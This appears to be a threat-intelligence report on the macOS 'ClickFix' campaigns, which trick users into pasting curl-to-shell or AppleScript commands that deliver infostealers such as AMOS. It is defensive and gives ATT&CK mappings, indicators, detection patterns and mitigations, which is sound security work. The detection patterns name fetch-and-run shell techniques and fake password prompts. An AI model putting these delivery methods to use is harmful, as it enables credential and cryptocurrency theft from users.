Full Report
Overview The "ClickFix" threat landscape has undergone a significant architectural shift, transitioning from legacy Windows-based execution to sophisticated macOS-targeted campaigns. These operations prioritize social engineering over software vulnerability exploitation, systematically leveraging established user behaviors and professional workflows. By presenting deceptive "fixes," "verifications," or installation prompts, adversaries induce users to manually execute malicious scripts via native utilities such as the Terminal or Script Editor. This methodology effectively bypasses macOS Gatekeeper protections, facilitating the direct delivery of high-impact infostealers, including AMOS (Atomic Stealer), Cuckoo Stealer, and SHub Stealer, into the target environment.
Analysis Summary
# Tool/Technique: ClickFix (macOS Variant)
## Overview
ClickFix is a sophisticated social engineering technique that has transitioned from Windows environments to target macOS users. The campaign bypasses technical security controls like macOS Gatekeeper not through software vulnerabilities, but by inducing users to manually execute malicious commands. It leverages high-fidelity deceptive interfaces (fake CAPTCHAs, technical blogs, or system "fixes") to trick users into running malicious scripts via native utilities like Terminal or Script Editor.
## Technical Details
- **Type**: Social Engineering Technique / Malware Delivery Framework
- **Platform**: macOS
- **Capabilities**: Gatekeeper bypass, credential harvesting, cryptocurrency theft, system exfiltration, memory-resident execution.
- **First Seen**: June 2024 (Current macOS-specific iteration)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1566.002 - Phishing: Spearphishing Link]
- **[TA0002 - Execution]**
- [T1059.002 - Command and Scripting Interpreter: AppleScript]
- [T1059.004 - Command and Scripting Interpreter: Unix Shell]
- [T1204.002 - User Execution: Malicious File]
- **[TA0005 - Defense Evasion]**
- [T1553.001 - Subvert Trust Controls: Gatekeeper Bypass]
- [T1027 - Obfuscated Files or Information]
- **[TA0006 - Credential Access]**
- [T1555 - Credentials from Password Stores]
- **[TA0010 - Exfiltration]**
- [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **Workflow Imitation**: Mimics standard developer/admin actions, such as using `curl | zsh` or `Homebrew` installation commands.
- **Native Utility Interfacing**: Uses the `applescript://` URL scheme to automatically trigger the macOS Script Editor.
- **Credential Harvesting**: Employs fake native-looking macOS password prompts to capture administrative credentials.
- **Memory-Resident Execution**: Uses `curl` piped to `zsh` with `tr` decoding to avoid writing malicious payloads to the disk.
### Advanced Features
- **Exploitation of Trust**: Uses typosquatted domains (e.g., `homabrews[.]org`) and compromised Ghost CMS infrastructure (CVE-2026-26980) to host loaders.
- **Locale Filtering**: Implements checks to avoid executing on machines located in CIS (Commonwealth of Independent States) countries.
- **Multi-Payload Support**: Acts as a delivery mechanism for various stealers including AMOS, Cuckoo, and SHub.
## Indicators of Compromise
- **File Names**: `Script Editor`, `Terminal` (misused native apps)
- **Network Indicators**:
- `homabrews[.]org`
- `applescript://` (Protocol handler abuse)
- **Behavioral Indicators**:
- Parent process `Browser` (Chrome/Safari) spawning `Terminal` or `Script Editor`.
- Commands involving `curl` piped directly into `sh`, `zsh`, or `python`.
- Unexpected use of the `tr` utility to decode long strings in the command line.
## Associated Threat Actors
- Multiple competing threat groups (unnamed in report)
- Sapphire Sleet (Related targeting patterns)
## Detection Methods
- **Behavioral Detection**: Monitor for web browsers initiating `Terminal.app` or `ScriptEditor.app`. Identify `curl` or `wget` commands that pipe content directly into a shell interpreter.
- **Signature-based**: Detection of known infostealer payloads (AMOS, Cuckoo) once written to disk or during memory injection.
- **Network Monitoring**: Flagging traffic to known typosquatted domains mimicking popular macOS developer tools.
## Mitigation Strategies
- **Prevention**: User awareness training focusing on the danger of "Copy-Paste" commands from websites into the Terminal.
- **Hardening**: Restrict use of `AppleScript` and `Terminal` via MDM profiles where not required for business functions.
- **Administrative Hygiene**: Treat any prompt for administrative credentials that appears immediately after a web-based action as highly suspicious.
## Related Tools/Techniques
- **AMOS (Atomic Stealer)**: Frequently delivered payload.
- **Cuckoo Stealer**: Frequently delivered payload.
- **SHub Stealer**: Targeted infostealer for digital assets.
- **Ghost CMS SQLi**: Used for infrastructure compromise to host the ClickFix lures.